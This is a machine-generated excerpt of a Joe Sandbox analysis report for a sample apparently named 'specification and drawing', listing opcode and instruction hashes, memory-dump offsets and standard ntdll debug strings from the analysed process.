                                                                                                          • Instruction ID: 58f4666e7bb0a2d0d72d158696c72ce8e59cde76faf7d63e4f7ef9f3e32e4476
                                                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                          • Instruction Fuzzy Hash: F1012832600689DBE336971DC906F9ABFD8EF81758F0941A9FB848FEA1D778D800C655
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bf4982da0e9c4cfa21f13d7fd1de102cce3aeba277196498e6d3f8cdbb32ef1
                                                                                                          • Instruction ID: fb1292d838e491e6efd2a1de5a4deb0c308a432e3cd64ea6667870edade1d7ae
                                                                                                          • Opcode Fuzzy Hash: 4bf4982da0e9c4cfa21f13d7fd1de102cce3aeba277196498e6d3f8cdbb32ef1
                                                                                                          • Instruction Fuzzy Hash: F6018F71E012499FCF08DFA9D441EEEBBF8BF58714F14405AE500AB280D774EA01CBA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                          • Instruction ID: 33044441ad4d4b0b2c00794eb3f19ad6af76c79b35e331849e0266df2514a164
                                                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                          • Instruction Fuzzy Hash: 59F01D7220011DBFEF019F95DD80DEF7BBEEB596A8B104125FA1196160D731DD21EBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                                                                                          • Instruction ID: f92b9561aa21be911a23688ba8c3c3c58dc4b44419a2a65608f0adb90ca8d7b2
                                                                                                          • Opcode Fuzzy Hash: 330eb9ad3af8190d00aa640127cfec9b254cfa789689b93362db6a4f7ca0c522
                                                                                                          • Instruction Fuzzy Hash: 5F018936100109ABCF169F84E940EDE3F66FF4C664F068111FE196A220C332D971EF81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                                                                                          • Instruction ID: 680a4650c292ef5062814784e9150072f8fdc3bcf498c1505d1f29020ff502f6
                                                                                                          • Opcode Fuzzy Hash: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                                                                                          • Instruction Fuzzy Hash: BCE09272100A549BC326BB29DD15FCA779AEB64764F014529F15597190CB34A850CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                                                                          • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                                                                                          • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                                                                          • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                          • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                                                                                          • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                          • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                                                                          • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                                                                                          • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                                                                          • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                                                                          • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                                                                                          • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                                                                          • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                          • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                                                                                          • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                          • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                                                                          • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                                                                                          • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                                                                          • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                          • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                                                                                          • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                          • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                                                                          • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                                                                                          • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                                                                          • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                          • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                                                                                          • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                          • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                                                                          • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
                                                                                                          • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                                                                          • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                          • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                                                                                          • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                          • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                                                                          • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                                                                                          • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                                                                          • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                          • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                                                                                          • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                          • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                                                                          • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                                                                                          • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                                                                          • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                                                                          • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                          • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                                                                                          • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                          • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                          • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                                                                                          • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                          • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                                                                                          Strings
                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                                                                          • ExecuteOptions, xrefs: 011346A0
                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                                                                          • Execute=1, xrefs: 01134713
                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                          • API String ID: 0-484625025
                                                                                                          • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                          • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                                                                                          • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                          • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-$0$0
                                                                                                          • API String ID: 1302938615-699404926
                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                                                                                          Strings
                                                                                                          • RTL: Re-Waiting, xrefs: 0113031E
                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                          • API String ID: 0-2474120054
                                                                                                          • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                          • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                                                                                          • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                          • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                                                                                          Strings
                                                                                                          • RTL: Resource at %p, xrefs: 01137B8E
                                                                                                          • RTL: Re-Waiting, xrefs: 01137BAC
                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 0-871070163
                                                                                                          • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                          • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                                                                                          • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                          • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                                                                          Strings
                                                                                                          • RTL: Resource at %p, xrefs: 011372A3
                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                                                                          • RTL: Re-Waiting, xrefs: 011372C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 885266447-605551621
                                                                                                          • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                                                                          • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                                                                                          • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                                                                          • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$]:%u
                                                                                                          • API String ID: 48624451-3050659472
                                                                                                          • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                                                                          • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                                                                                          • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                                                                          • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-
                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                          • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                          • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$@
                                                                                                          • API String ID: 0-1194432280
                                                                                                          • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                                                                          • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                                                                                          • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                                                                          • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0
                                                                                                          APIs
                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0114CFBD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallFilterFunc@8
                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                          • API String ID: 4062629308-3101775584
